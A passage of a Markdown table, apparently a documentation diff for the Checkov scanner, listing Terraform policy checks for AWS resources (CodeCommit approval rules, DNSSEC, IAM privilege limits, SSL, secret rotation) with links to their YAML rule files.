CKV2_AWS_37 | resource | aws_storagegateway_working_storage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1087 | CKV2_AWS_37 | resource | aws_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1088 | CKV2_AWS_37 | resource | aws_swf_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1089 | CKV2_AWS_37 | resource | aws_transfer_server | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1090 | CKV2_AWS_37 | resource | aws_transfer_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1091 | CKV2_AWS_37 | resource | aws_transfer_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1092 | CKV2_AWS_37 | resource | aws_volume_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1093 | CKV2_AWS_37 | resource | aws_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1094 | CKV2_AWS_37 | resource | aws_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1095 | CKV2_AWS_37 | resource | aws_vpc_dhcp_options_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1096 | CKV2_AWS_37 | resource | aws_vpc_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1097 | CKV2_AWS_37 | resource | aws_vpc_endpoint_connection_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1098 | CKV2_AWS_37 | resource | aws_vpc_endpoint_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1099 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1100 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service_allowed_principal | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1101 | CKV2_AWS_37 | resource | aws_vpc_endpoint_subnet_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1102 | CKV2_AWS_37 | resource | aws_vpc_ipv4_cidr_block_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1103 | CKV2_AWS_37 | resource | aws_vpc_peering_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1104 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1105 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1106 | CKV2_AWS_37 | resource | aws_vpn_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1107 | CKV2_AWS_37 | resource | aws_vpn_connection_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1108 | CKV2_AWS_37 | resource | aws_vpn_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1109 | CKV2_AWS_37 | resource | aws_vpn_gateway_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1110 | CKV2_AWS_37 | resource | aws_vpn_gateway_route_propagation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1111 | CKV2_AWS_37 | resource | aws_waf_byte_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1112 | CKV2_AWS_37 | resource | aws_waf_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1113 | CKV2_AWS_37 | resource | aws_waf_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1114 | CKV2_AWS_37 | resource | aws_waf_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1115 | CKV2_AWS_37 | resource | aws_waf_regex_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1116 | CKV2_AWS_37 | resource | aws_waf_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1117 | CKV2_AWS_37 | resource | aws_waf_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1118 | CKV2_AWS_37 | resource | aws_waf_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1119 | CKV2_AWS_37 | resource | aws_waf_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1120 | CKV2_AWS_37 | resource | aws_waf_sql_injection_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1121 | CKV2_AWS_37 | resource | aws_waf_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1122 | CKV2_AWS_37 | resource | aws_waf_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1123 | CKV2_AWS_37 | resource | aws_wafregional_byte_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1124 | CKV2_AWS_37 | resource | aws_wafregional_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1125 | CKV2_AWS_37 | resource | aws_wafregional_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1126 | CKV2_AWS_37 | resource | aws_wafregional_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1127 | CKV2_AWS_37 | resource | aws_wafregional_regex_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1128 | CKV2_AWS_37 | resource | aws_wafregional_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1129 | CKV2_AWS_37 | resource | aws_wafregional_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1130 | CKV2_AWS_37 | resource | aws_wafregional_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1131 | CKV2_AWS_37 | resource | aws_wafregional_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1132 | CKV2_AWS_37 | resource | aws_wafregional_sql_injection_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1133 | CKV2_AWS_37 | resource | aws_wafregional_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1134 | CKV2_AWS_37 | resource | aws_wafregional_web_acl_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1135 | CKV2_AWS_37 | resource | aws_wafregional_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1136 | CKV2_AWS_37 | resource | aws_wafv2_ip_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1137 | CKV2_AWS_37 | resource | aws_wafv2_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1138 | CKV2_AWS_37 | resource | aws_wafv2_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1139 | CKV2_AWS_37 | resource | aws_wafv2_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1140 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1141 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_logging_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1142 | CKV2_AWS_37 | resource | aws_worklink_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1143 | CKV2_AWS_37 | resource | aws_worklink_website_certificate_authority_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1144 | CKV2_AWS_37 | resource | aws_workspaces_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1145 | CKV2_AWS_37 | resource | aws_workspaces_ip_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1146 | CKV2_AWS_37 | resource | aws_workspaces_workspace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1147 | CKV2_AWS_37 | resource | aws_xray_sampling_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1148 | CKV2_AWS_38 | resource | aws_route53_zone | Ensure Domain Name System Security Extensions (DNSSEC) signing is enabled for Amazon Route 53 public hosted zones | Terraform | [Route53ZoneEnableDNSSECSigning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneEnableDNSSECSigning.yaml) | +| 1149 | CKV2_AWS_39 | resource | aws_route53_zone | Ensure Domain Name System (DNS) query logging is enabled for Amazon Route 53 hosted zones | Terraform | [Route53ZoneHasMatchingQueryLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneHasMatchingQueryLog.yaml) | +| 1150 | CKV2_AWS_40 | resource | aws_iam_group_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1151 | CKV2_AWS_40 | resource | aws_iam_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1152 | CKV2_AWS_40 | resource | aws_iam_role_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1153 | CKV2_AWS_40 | resource | aws_iam_user_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1154 | CKV2_AWS_40 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1155 | CKV2_AWS_40 | resource | data.aws_iam_policy_document | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1156 | CKV2_AWS_41 | resource | aws_instance | Ensure an IAM role is attached to EC2 instance | Terraform | [EC2InstanceHasIAMRoleAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EC2InstanceHasIAMRoleAttached.yaml) | +| 1157 | CKV2_AWS_42 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution uses custom SSL certificate | Terraform | [CloudFrontHasCustomSSLCertificate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasCustomSSLCertificate.yaml) | +| 1158 | CKV2_AWS_43 | resource | aws_s3_bucket_acl | Ensure S3 Bucket does not allow access to all Authenticated users | Terraform | [S3NotAllowAccessToAllAuthenticatedUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3NotAllowAccessToAllAuthenticatedUsers.yaml) | +| 1159 | CKV2_AWS_44 | resource | aws_route | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) | +| 1160 | CKV2_AWS_44 | resource | aws_route_table | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) | +| 1161 | CKV2_AWS_45 | resource | aws_config_configuration_recorder | Ensure AWS Config recorder is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) | +| 1162 | CKV2_AWS_45 | resource | aws_config_configuration_recorder_status | Ensure AWS Config recorder is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) | +| 1163 | CKV2_AWS_46 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront Distribution with S3 have Origin Access set to enabled | Terraform | [CLoudFrontS3OriginConfigWithOAI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CLoudFrontS3OriginConfigWithOAI.yaml) | +| 1164 | CKV2_AWS_47 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) | +| 1165 | CKV2_AWS_47 | resource | aws_wafv2_web_acl | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) | +| 1166 | CKV2_AWS_48 | resource | aws_config_configuration_recorder | Ensure AWS Config must record all possible resources | Terraform | [ConfigRecorderRecordsAllGlobalResources.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ConfigRecorderRecordsAllGlobalResources.yaml) | +| 1167 | CKV2_AWS_49 | resource | aws_dms_endpoint | Ensure AWS Database Migration Service endpoints have SSL configured | Terraform | [DMSEndpointHaveSSLConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/DMSEndpointHaveSSLConfigured.yaml) | +| 1168 | CKV2_AWS_50 | resource | aws_elasticache_replication_group | Ensure AWS ElastiCache Redis cluster with Multi-AZ Automatic Failover feature set to enabled | Terraform | [ElastiCacheRedisConfiguredAutomaticFailOver.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElastiCacheRedisConfiguredAutomaticFailOver.yaml) | +| 1169 | CKV2_AWS_51 | resource | aws_api_gateway_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | +| 1170 | CKV2_AWS_51 | resource | aws_apigatewayv2_api | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | +| 1171 | CKV2_AWS_51 | resource | aws_apigatewayv2_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | +| 1172 | CKV2_AWS_52 | resource | aws_elasticsearch_domain | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) | +| 1173 | CKV2_AWS_52 | resource | aws_opensearch_domain | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) | +| 1174 | CKV2_AWS_53 | resource | aws_api_gateway_method | Ensure AWS API gateway request is validated | Terraform | [APIGatewayRequestParameterValidationEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayRequestParameterValidationEnabled.yaml) | +| 1175 | CKV2_AWS_54 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution is using secure SSL protocols for HTTPS communication | Terraform | [CloudFrontUsesSecureProtocolsForHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontUsesSecureProtocolsForHTTPS.yaml) | +| 1176 | CKV2_AWS_55 | resource | aws_emr_cluster | Ensure AWS EMR cluster is configured with security configuration | Terraform | [EMRClusterHasSecurityConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EMRClusterHasSecurityConfiguration.yaml) | +| 1177 | CKV2_AWS_56 | resource | aws_iam_group_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1178 | CKV2_AWS_56 | resource | aws_iam_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1179 | CKV2_AWS_56 | resource | aws_iam_role | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1180 | CKV2_AWS_56 | resource | aws_iam_role_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1181 | CKV2_AWS_56 | resource | aws_iam_user_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1182 | CKV2_AWS_56 | resource | aws_ssoadmin_managed_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1183 | CKV2_AWS_56 | resource | data.aws_iam_policy | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1184 | CKV2_AWS_57 | resource | aws_secretsmanager_secret | Ensure Secrets Manager secrets should have automatic rotation enabled | Terraform | [SecretsAreRotated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SecretsAreRotated.yaml) | +| 1185 | CKV2_AWS_58 | resource | aws_neptune_cluster | Ensure AWS Neptune cluster deletion protection is enabled | Terraform | 